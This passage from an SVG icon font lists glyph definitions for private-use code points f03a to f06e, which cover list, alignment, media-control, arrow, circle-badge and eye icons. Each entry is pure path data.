<glyph unicode="&#xf03a;" horiz-adv-x="1792" d="M256 224v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-192q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h192q13 0 22.5 -9.5t9.5 -22.5zM256 608v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-192q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h192q13 0 22.5 -9.5 t9.5 -22.5zM256 992v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-192q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h192q13 0 22.5 -9.5t9.5 -22.5zM1792 224v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1344q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1344 q13 0 22.5 -9.5t9.5 -22.5zM256 1376v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-192q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h192q13 0 22.5 -9.5t9.5 -22.5zM1792 608v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1344q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5 t22.5 9.5h1344q13 0 22.5 -9.5t9.5 -22.5zM1792 992v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1344q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1344q13 0 22.5 -9.5t9.5 -22.5zM1792 1376v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1344q-13 0 -22.5 9.5t-9.5 22.5v192 q0 13 9.5 22.5t22.5 9.5h1344q13 0 22.5 -9.5t9.5 -22.5z" />
<glyph unicode="&#xf03b;" horiz-adv-x="1792" d="M384 992v-576q0 -13 -9.5 -22.5t-22.5 -9.5q-14 0 -23 9l-288 288q-9 9 -9 23t9 23l288 288q9 9 23 9q13 0 22.5 -9.5t9.5 -22.5zM1792 224v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1728q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1728q13 0 22.5 -9.5 t9.5 -22.5zM1792 608v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1088q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1088q13 0 22.5 -9.5t9.5 -22.5zM1792 992v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1088q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1088 q13 0 22.5 -9.5t9.5 -22.5zM1792 1376v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1728q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1728q13 0 22.5 -9.5t9.5 -22.5z" />
<glyph unicode="&#xf03c;" horiz-adv-x="1792" d="M352 704q0 -14 -9 -23l-288 -288q-9 -9 -23 -9q-13 0 -22.5 9.5t-9.5 22.5v576q0 13 9.5 22.5t22.5 9.5q14 0 23 -9l288 -288q9 -9 9 -23zM1792 224v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1728q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1728q13 0 22.5 -9.5 t9.5 -22.5zM1792 608v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1088q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1088q13 0 22.5 -9.5t9.5 -22.5zM1792 992v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1088q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1088 q13 0 22.5 -9.5t9.5 -22.5zM1792 1376v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1728q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1728q13 0 22.5 -9.5t9.5 -22.5z" />
<glyph unicode="&#xf03d;" horiz-adv-x="1792" d="M1792 1184v-1088q0 -42 -39 -59q-13 -5 -25 -5q-27 0 -45 19l-403 403v-166q0 -119 -84.5 -203.5t-203.5 -84.5h-704q-119 0 -203.5 84.5t-84.5 203.5v704q0 119 84.5 203.5t203.5 84.5h704q119 0 203.5 -84.5t84.5 -203.5v-165l403 402q18 19 45 19q12 0 25 -5 q39 -17 39 -59z" />
<glyph unicode="&#xf03e;" horiz-adv-x="1920" d="M640 960q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM1664 576v-448h-1408v192l320 320l160 -160l512 512zM1760 1280h-1600q-13 0 -22.5 -9.5t-9.5 -22.5v-1216q0 -13 9.5 -22.5t22.5 -9.5h1600q13 0 22.5 9.5t9.5 22.5v1216 q0 13 -9.5 22.5t-22.5 9.5zM1920 1248v-1216q0 -66 -47 -113t-113 -47h-1600q-66 0 -113 47t-47 113v1216q0 66 47 113t113 47h1600q66 0 113 -47t47 -113z" />
<glyph unicode="&#xf040;" d="M363 0l91 91l-235 235l-91 -91v-107h128v-128h107zM886 928q0 22 -22 22q-10 0 -17 -7l-542 -542q-7 -7 -7 -17q0 -22 22 -22q10 0 17 7l542 542q7 7 7 17zM832 1120l416 -416l-832 -832h-416v416zM1515 1024q0 -53 -37 -90l-166 -166l-416 416l166 165q36 38 90 38 q53 0 91 -38l235 -234q37 -39 37 -91z" />
<glyph unicode="&#xf041;" horiz-adv-x="1024" d="M768 896q0 106 -75 181t-181 75t-181 -75t-75 -181t75 -181t181 -75t181 75t75 181zM1024 896q0 -109 -33 -179l-364 -774q-16 -33 -47.5 -52t-67.5 -19t-67.5 19t-46.5 52l-365 774q-33 70 -33 179q0 212 150 362t362 150t362 -150t150 -362z" />
<glyph unicode="&#xf042;" d="M768 96v1088q-148 0 -273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf043;" horiz-adv-x="1024" d="M512 384q0 36 -20 69q-1 1 -15.5 22.5t-25.5 38t-25 44t-21 50.5q-4 16 -21 16t-21 -16q-7 -23 -21 -50.5t-25 -44t-25.5 -38t-15.5 -22.5q-20 -33 -20 -69q0 -53 37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1024 512q0 -212 -150 -362t-362 -150t-362 150t-150 362 q0 145 81 275q6 9 62.5 90.5t101 151t99.5 178t83 201.5q9 30 34 47t51 17t51.5 -17t33.5 -47q28 -93 83 -201.5t99.5 -178t101 -151t62.5 -90.5q81 -127 81 -275z" />
<glyph unicode="&#xf044;" horiz-adv-x="1792" d="M888 352l116 116l-152 152l-116 -116v-56h96v-96h56zM1328 1072q-16 16 -33 -1l-350 -350q-17 -17 -1 -33t33 1l350 350q17 17 1 33zM1408 478v-190q0 -119 -84.5 -203.5t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h832 q63 0 117 -25q15 -7 18 -23q3 -17 -9 -29l-49 -49q-14 -14 -32 -8q-23 6 -45 6h-832q-66 0 -113 -47t-47 -113v-832q0 -66 47 -113t113 -47h832q66 0 113 47t47 113v126q0 13 9 22l64 64q15 15 35 7t20 -29zM1312 1216l288 -288l-672 -672h-288v288zM1756 1084l-92 -92 l-288 288l92 92q28 28 68 28t68 -28l152 -152q28 -28 28 -68t-28 -68z" />
<glyph unicode="&#xf045;" horiz-adv-x="1664" d="M1408 547v-259q0 -119 -84.5 -203.5t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h255v0q13 0 22.5 -9.5t9.5 -22.5q0 -27 -26 -32q-77 -26 -133 -60q-10 -4 -16 -4h-112q-66 0 -113 -47t-47 -113v-832q0 -66 47 -113t113 -47h832 q66 0 113 47t47 113v214q0 19 18 29q28 13 54 37q16 16 35 8q21 -9 21 -29zM1645 1043l-384 -384q-18 -19 -45 -19q-12 0 -25 5q-39 17 -39 59v192h-160q-323 0 -438 -131q-119 -137 -74 -473q3 -23 -20 -34q-8 -2 -12 -2q-16 0 -26 13q-10 14 -21 31t-39.5 68.5t-49.5 99.5 t-38.5 114t-17.5 122q0 49 3.5 91t14 90t28 88t47 81.5t68.5 74t94.5 61.5t124.5 48.5t159.5 30.5t196.5 11h160v192q0 42 39 59q13 5 25 5q26 0 45 -19l384 -384q19 -19 19 -45t-19 -45z" />
<glyph unicode="&#xf046;" horiz-adv-x="1664" d="M1408 606v-318q0 -119 -84.5 -203.5t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h832q63 0 117 -25q15 -7 18 -23q3 -17 -9 -29l-49 -49q-10 -10 -23 -10q-3 0 -9 2q-23 6 -45 6h-832q-66 0 -113 -47t-47 -113v-832 q0 -66 47 -113t113 -47h832q66 0 113 47t47 113v254q0 13 9 22l64 64q10 10 23 10q6 0 12 -3q20 -8 20 -29zM1639 1095l-814 -814q-24 -24 -57 -24t-57 24l-430 430q-24 24 -24 57t24 57l110 110q24 24 57 24t57 -24l263 -263l647 647q24 24 57 24t57 -24l110 -110 q24 -24 24 -57t-24 -57z" />
<glyph unicode="&#xf047;" horiz-adv-x="1792" d="M1792 640q0 -26 -19 -45l-256 -256q-19 -19 -45 -19t-45 19t-19 45v128h-384v-384h128q26 0 45 -19t19 -45t-19 -45l-256 -256q-19 -19 -45 -19t-45 19l-256 256q-19 19 -19 45t19 45t45 19h128v384h-384v-128q0 -26 -19 -45t-45 -19t-45 19l-256 256q-19 19 -19 45 t19 45l256 256q19 19 45 19t45 -19t19 -45v-128h384v384h-128q-26 0 -45 19t-19 45t19 45l256 256q19 19 45 19t45 -19l256 -256q19 -19 19 -45t-19 -45t-45 -19h-128v-384h384v128q0 26 19 45t45 19t45 -19l256 -256q19 -19 19 -45z" />
<glyph unicode="&#xf048;" horiz-adv-x="1024" d="M979 1395q19 19 32 13t13 -32v-1472q0 -26 -13 -32t-32 13l-710 710q-9 9 -13 19v-678q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v1408q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-678q4 11 13 19z" />
<glyph unicode="&#xf049;" horiz-adv-x="1792" d="M1747 1395q19 19 32 13t13 -32v-1472q0 -26 -13 -32t-32 13l-710 710q-9 9 -13 19v-710q0 -26 -13 -32t-32 13l-710 710q-9 9 -13 19v-678q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v1408q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-678q4 11 13 19l710 710 q19 19 32 13t13 -32v-710q4 11 13 19z" />
<glyph unicode="&#xf04a;" horiz-adv-x="1664" d="M1619 1395q19 19 32 13t13 -32v-1472q0 -26 -13 -32t-32 13l-710 710q-8 9 -13 19v-710q0 -26 -13 -32t-32 13l-710 710q-19 19 -19 45t19 45l710 710q19 19 32 13t13 -32v-710q5 11 13 19z" />
<glyph unicode="&#xf04b;" horiz-adv-x="1408" d="M1384 609l-1328 -738q-23 -13 -39.5 -3t-16.5 36v1472q0 26 16.5 36t39.5 -3l1328 -738q23 -13 23 -31t-23 -31z" />
<glyph unicode="&#xf04c;" d="M1536 1344v-1408q0 -26 -19 -45t-45 -19h-512q-26 0 -45 19t-19 45v1408q0 26 19 45t45 19h512q26 0 45 -19t19 -45zM640 1344v-1408q0 -26 -19 -45t-45 -19h-512q-26 0 -45 19t-19 45v1408q0 26 19 45t45 19h512q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf04d;" d="M1536 1344v-1408q0 -26 -19 -45t-45 -19h-1408q-26 0 -45 19t-19 45v1408q0 26 19 45t45 19h1408q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf04e;" horiz-adv-x="1664" d="M45 -115q-19 -19 -32 -13t-13 32v1472q0 26 13 32t32 -13l710 -710q8 -8 13 -19v710q0 26 13 32t32 -13l710 -710q19 -19 19 -45t-19 -45l-710 -710q-19 -19 -32 -13t-13 32v710q-5 -10 -13 -19z" />
<glyph unicode="&#xf050;" horiz-adv-x="1792" d="M45 -115q-19 -19 -32 -13t-13 32v1472q0 26 13 32t32 -13l710 -710q8 -8 13 -19v710q0 26 13 32t32 -13l710 -710q8 -8 13 -19v678q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-1408q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v678q-5 -10 -13 -19l-710 -710 q-19 -19 -32 -13t-13 32v710q-5 -10 -13 -19z" />
<glyph unicode="&#xf051;" horiz-adv-x="1024" d="M45 -115q-19 -19 -32 -13t-13 32v1472q0 26 13 32t32 -13l710 -710q8 -8 13 -19v678q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-1408q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v678q-5 -10 -13 -19z" />
<glyph unicode="&#xf052;" horiz-adv-x="1538" d="M14 557l710 710q19 19 45 19t45 -19l710 -710q19 -19 13 -32t-32 -13h-1472q-26 0 -32 13t13 32zM1473 0h-1408q-26 0 -45 19t-19 45v256q0 26 19 45t45 19h1408q26 0 45 -19t19 -45v-256q0 -26 -19 -45t-45 -19z" />
<glyph unicode="&#xf053;" horiz-adv-x="1280" d="M1171 1235l-531 -531l531 -531q19 -19 19 -45t-19 -45l-166 -166q-19 -19 -45 -19t-45 19l-742 742q-19 19 -19 45t19 45l742 742q19 19 45 19t45 -19l166 -166q19 -19 19 -45t-19 -45z" />
<glyph unicode="&#xf054;" horiz-adv-x="1280" d="M1107 659l-742 -742q-19 -19 -45 -19t-45 19l-166 166q-19 19 -19 45t19 45l531 531l-531 531q-19 19 -19 45t19 45l166 166q19 19 45 19t45 -19l742 -742q19 -19 19 -45t-19 -45z" />
<glyph unicode="&#xf055;" d="M1216 576v128q0 26 -19 45t-45 19h-256v256q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-256h-256q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h256v-256q0 -26 19 -45t45 -19h128q26 0 45 19t19 45v256h256q26 0 45 19t19 45zM1536 640q0 -209 -103 -385.5 t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf056;" d="M1216 576v128q0 26 -19 45t-45 19h-768q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h768q26 0 45 19t19 45zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5 t103 -385.5z" />
<glyph unicode="&#xf057;" d="M1149 414q0 26 -19 45l-181 181l181 181q19 19 19 45q0 27 -19 46l-90 90q-19 19 -46 19q-26 0 -45 -19l-181 -181l-181 181q-19 19 -45 19q-27 0 -46 -19l-90 -90q-19 -19 -19 -46q0 -26 19 -45l181 -181l-181 -181q-19 -19 -19 -45q0 -27 19 -46l90 -90q19 -19 46 -19 q26 0 45 19l181 181l181 -181q19 -19 45 -19q27 0 46 19l90 90q19 19 19 46zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf058;" d="M1284 802q0 28 -18 46l-91 90q-19 19 -45 19t-45 -19l-408 -407l-226 226q-19 19 -45 19t-45 -19l-91 -90q-18 -18 -18 -46q0 -27 18 -45l362 -362q19 -19 45 -19q27 0 46 19l543 543q18 18 18 45zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103 t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf059;" d="M896 160v192q0 14 -9 23t-23 9h-192q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h192q14 0 23 9t9 23zM1152 832q0 88 -55.5 163t-138.5 116t-170 41q-243 0 -371 -213q-15 -24 8 -42l132 -100q7 -6 19 -6q16 0 25 12q53 68 86 92q34 24 86 24q48 0 85.5 -26t37.5 -59 q0 -38 -20 -61t-68 -45q-63 -28 -115.5 -86.5t-52.5 -125.5v-36q0 -14 9 -23t23 -9h192q14 0 23 9t9 23q0 19 21.5 49.5t54.5 49.5q32 18 49 28.5t46 35t44.5 48t28 60.5t12.5 81zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5 t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf05a;" d="M1024 160v160q0 14 -9 23t-23 9h-96v512q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-160q0 -14 9 -23t23 -9h96v-320h-96q-14 0 -23 -9t-9 -23v-160q0 -14 9 -23t23 -9h448q14 0 23 9t9 23zM896 1056v160q0 14 -9 23t-23 9h-192q-14 0 -23 -9t-9 -23v-160q0 -14 9 -23 t23 -9h192q14 0 23 9t9 23zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf05b;" d="M1197 512h-109q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h109q-32 108 -112.5 188.5t-188.5 112.5v-109q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v109q-108 -32 -188.5 -112.5t-112.5 -188.5h109q26 0 45 -19t19 -45v-128q0 -26 -19 -45t-45 -19h-109 q32 -108 112.5 -188.5t188.5 -112.5v109q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-109q108 32 188.5 112.5t112.5 188.5zM1536 704v-128q0 -26 -19 -45t-45 -19h-143q-37 -161 -154.5 -278.5t-278.5 -154.5v-143q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v143 q-161 37 -278.5 154.5t-154.5 278.5h-143q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h143q37 161 154.5 278.5t278.5 154.5v143q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-143q161 -37 278.5 -154.5t154.5 -278.5h143q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf05c;" d="M1097 457l-146 -146q-10 -10 -23 -10t-23 10l-137 137l-137 -137q-10 -10 -23 -10t-23 10l-146 146q-10 10 -10 23t10 23l137 137l-137 137q-10 10 -10 23t10 23l146 146q10 10 23 10t23 -10l137 -137l137 137q10 10 23 10t23 -10l146 -146q10 -10 10 -23t-10 -23 l-137 -137l137 -137q10 -10 10 -23t-10 -23zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5 t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf05d;" d="M1171 723l-422 -422q-19 -19 -45 -19t-45 19l-294 294q-19 19 -19 45t19 45l102 102q19 19 45 19t45 -19l147 -147l275 275q19 19 45 19t45 -19l102 -102q19 -19 19 -45t-19 -45zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198t-73 -273t73 -273t198 -198 t273 -73t273 73t198 198t73 273zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf05e;" d="M1312 643q0 161 -87 295l-754 -753q137 -89 297 -89q111 0 211.5 43.5t173.5 116.5t116 174.5t43 212.5zM313 344l755 754q-135 91 -300 91q-148 0 -273 -73t-198 -199t-73 -274q0 -162 89 -299zM1536 643q0 -157 -61 -300t-163.5 -246t-245 -164t-298.5 -61t-298.5 61 t-245 164t-163.5 246t-61 300t61 299.5t163.5 245.5t245 164t298.5 61t298.5 -61t245 -164t163.5 -245.5t61 -299.5z" />
<glyph unicode="&#xf060;" d="M1536 640v-128q0 -53 -32.5 -90.5t-84.5 -37.5h-704l293 -294q38 -36 38 -90t-38 -90l-75 -76q-37 -37 -90 -37q-52 0 -91 37l-651 652q-37 37 -37 90q0 52 37 91l651 650q38 38 91 38q52 0 90 -38l75 -74q38 -38 38 -91t-38 -91l-293 -293h704q52 0 84.5 -37.5 t32.5 -90.5z" />
<glyph unicode="&#xf061;" d="M1472 576q0 -54 -37 -91l-651 -651q-39 -37 -91 -37q-51 0 -90 37l-75 75q-38 38 -38 91t38 91l293 293h-704q-52 0 -84.5 37.5t-32.5 90.5v128q0 53 32.5 90.5t84.5 37.5h704l-293 294q-38 36 -38 90t38 90l75 75q38 38 90 38q53 0 91 -38l651 -651q37 -35 37 -90z" />
<glyph unicode="&#xf062;" horiz-adv-x="1664" d="M1611 565q0 -51 -37 -90l-75 -75q-38 -38 -91 -38q-54 0 -90 38l-294 293v-704q0 -52 -37.5 -84.5t-90.5 -32.5h-128q-53 0 -90.5 32.5t-37.5 84.5v704l-294 -293q-36 -38 -90 -38t-90 38l-75 75q-38 38 -38 90q0 53 38 91l651 651q35 37 90 37q54 0 91 -37l651 -651 q37 -39 37 -91z" />
<glyph unicode="&#xf063;" horiz-adv-x="1664" d="M1611 704q0 -53 -37 -90l-651 -652q-39 -37 -91 -37q-53 0 -90 37l-651 652q-38 36 -38 90q0 53 38 91l74 75q39 37 91 37q53 0 90 -37l294 -294v704q0 52 38 90t90 38h128q52 0 90 -38t38 -90v-704l294 294q37 37 90 37q52 0 91 -37l75 -75q37 -39 37 -91z" />
<glyph unicode="&#xf064;" horiz-adv-x="1792" d="M1792 896q0 -26 -19 -45l-512 -512q-19 -19 -45 -19t-45 19t-19 45v256h-224q-98 0 -175.5 -6t-154 -21.5t-133 -42.5t-105.5 -69.5t-80 -101t-48.5 -138.5t-17.5 -181q0 -55 5 -123q0 -6 2.5 -23.5t2.5 -26.5q0 -15 -8.5 -25t-23.5 -10q-16 0 -28 17q-7 9 -13 22 t-13.5 30t-10.5 24q-127 285 -127 451q0 199 53 333q162 403 875 403h224v256q0 26 19 45t45 19t45 -19l512 -512q19 -19 19 -45z" />
<glyph unicode="&#xf065;" d="M755 480q0 -13 -10 -23l-332 -332l144 -144q19 -19 19 -45t-19 -45t-45 -19h-448q-26 0 -45 19t-19 45v448q0 26 19 45t45 19t45 -19l144 -144l332 332q10 10 23 10t23 -10l114 -114q10 -10 10 -23zM1536 1344v-448q0 -26 -19 -45t-45 -19t-45 19l-144 144l-332 -332 q-10 -10 -23 -10t-23 10l-114 114q-10 10 -10 23t10 23l332 332l-144 144q-19 19 -19 45t19 45t45 19h448q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf066;" d="M768 576v-448q0 -26 -19 -45t-45 -19t-45 19l-144 144l-332 -332q-10 -10 -23 -10t-23 10l-114 114q-10 10 -10 23t10 23l332 332l-144 144q-19 19 -19 45t19 45t45 19h448q26 0 45 -19t19 -45zM1523 1248q0 -13 -10 -23l-332 -332l144 -144q19 -19 19 -45t-19 -45 t-45 -19h-448q-26 0 -45 19t-19 45v448q0 26 19 45t45 19t45 -19l144 -144l332 332q10 10 23 10t23 -10l114 -114q10 -10 10 -23z" />
<glyph unicode="&#xf067;" horiz-adv-x="1408" d="M1408 800v-192q0 -40 -28 -68t-68 -28h-416v-416q0 -40 -28 -68t-68 -28h-192q-40 0 -68 28t-28 68v416h-416q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h416v416q0 40 28 68t68 28h192q40 0 68 -28t28 -68v-416h416q40 0 68 -28t28 -68z" />
<glyph unicode="&#xf068;" horiz-adv-x="1408" d="M1408 800v-192q0 -40 -28 -68t-68 -28h-1216q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h1216q40 0 68 -28t28 -68z" />
<glyph unicode="&#xf069;" horiz-adv-x="1664" d="M1482 486q46 -26 59.5 -77.5t-12.5 -97.5l-64 -110q-26 -46 -77.5 -59.5t-97.5 12.5l-266 153v-307q0 -52 -38 -90t-90 -38h-128q-52 0 -90 38t-38 90v307l-266 -153q-46 -26 -97.5 -12.5t-77.5 59.5l-64 110q-26 46 -12.5 97.5t59.5 77.5l266 154l-266 154 q-46 26 -59.5 77.5t12.5 97.5l64 110q26 46 77.5 59.5t97.5 -12.5l266 -153v307q0 52 38 90t90 38h128q52 0 90 -38t38 -90v-307l266 153q46 26 97.5 12.5t77.5 -59.5l64 -110q26 -46 12.5 -97.5t-59.5 -77.5l-266 -154z" />
<glyph unicode="&#xf06a;" d="M768 1408q209 0 385.5 -103t279.5 -279.5t103 -385.5t-103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103zM896 161v190q0 14 -9 23.5t-22 9.5h-192q-13 0 -23 -10t-10 -23v-190q0 -13 10 -23t23 -10h192 q13 0 22 9.5t9 23.5zM894 505l18 621q0 12 -10 18q-10 8 -24 8h-220q-14 0 -24 -8q-10 -6 -10 -18l17 -621q0 -10 10 -17.5t24 -7.5h185q14 0 23.5 7.5t10.5 17.5z" />
<glyph unicode="&#xf06b;" d="M928 180v56v468v192h-320v-192v-468v-56q0 -25 18 -38.5t46 -13.5h192q28 0 46 13.5t18 38.5zM472 1024h195l-126 161q-26 31 -69 31q-40 0 -68 -28t-28 -68t28 -68t68 -28zM1160 1120q0 40 -28 68t-68 28q-43 0 -69 -31l-125 -161h194q40 0 68 28t28 68zM1536 864v-320 q0 -14 -9 -23t-23 -9h-96v-416q0 -40 -28 -68t-68 -28h-1088q-40 0 -68 28t-28 68v416h-96q-14 0 -23 9t-9 23v320q0 14 9 23t23 9h440q-93 0 -158.5 65.5t-65.5 158.5t65.5 158.5t158.5 65.5q107 0 168 -77l128 -165l128 165q61 77 168 77q93 0 158.5 -65.5t65.5 -158.5 t-65.5 -158.5t-158.5 -65.5h440q14 0 23 -9t9 -23z" />
<glyph unicode="&#xf06c;" horiz-adv-x="1792" d="M1280 832q0 26 -19 45t-45 19q-172 0 -318 -49.5t-259.5 -134t-235.5 -219.5q-19 -21 -19 -45q0 -26 19 -45t45 -19q24 0 45 19q27 24 74 71t67 66q137 124 268.5 176t313.5 52q26 0 45 19t19 45zM1792 1030q0 -95 -20 -193q-46 -224 -184.5 -383t-357.5 -268 q-214 -108 -438 -108q-148 0 -286 47q-15 5 -88 42t-96 37q-16 0 -39.5 -32t-45 -70t-52.5 -70t-60 -32q-30 0 -51 11t-31 24t-27 42q-2 4 -6 11t-5.5 10t-3 9.5t-1.5 13.5q0 35 31 73.5t68 65.5t68 56t31 48q0 4 -14 38t-16 44q-9 51 -9 104q0 115 43.5 220t119 184.5 t170.5 139t204 95.5q55 18 145 25.5t179.5 9t178.5 6t163.5 24t113.5 56.5l29.5 29.5t29.5 28t27 20t36.5 16t43.5 4.5q39 0 70.5 -46t47.5 -112t24 -124t8 -96z" />
<glyph unicode="&#xf06d;" horiz-adv-x="1408" d="M1408 -160v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-1344q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h1344q13 0 22.5 -9.5t9.5 -22.5zM1152 896q0 -78 -24.5 -144t-64 -112.5t-87.5 -88t-96 -77.5t-87.5 -72t-64 -81.5t-24.5 -96.5q0 -96 67 -224l-4 1l1 -1 q-90 41 -160 83t-138.5 100t-113.5 122.5t-72.5 150.5t-27.5 184q0 78 24.5 144t64 112.5t87.5 88t96 77.5t87.5 72t64 81.5t24.5 96.5q0 94 -66 224l3 -1l-1 1q90 -41 160 -83t138.5 -100t113.5 -122.5t72.5 -150.5t27.5 -184z" />
<glyph unicode="&#xf06e;" horiz-adv-x="1792" d="M1664 576q-152 236 -381 353q61 -104 61 -225q0 -185 -131.5 -316.5t-316.5 -131.5t-316.5 131.5t-131.5 316.5q0 121 61 225q-229 -117 -381 -353q133 -205 333.5 -326.5t434.5 -121.5t434.5 121.5t333.5 326.5zM944 960q0 20 -14 34t-34 14q-125 0 -214.5 -89.5 t-89.5 -214.5q0 -20 14 -34t34 -14t34 14t14 34q0 86 61 147t147 61q20 0 34 14t14 34zM1792 576q0 -34 -20 -69q-140 -230 -376.5 -368.5t-499.5 -138.5t-499.5 139t-376.5 368q-20 35 -20 69t20 69q140 229 376.5 368t499.5 139t499.5 -139t376.5 -368q20 -35 20 -69z" />
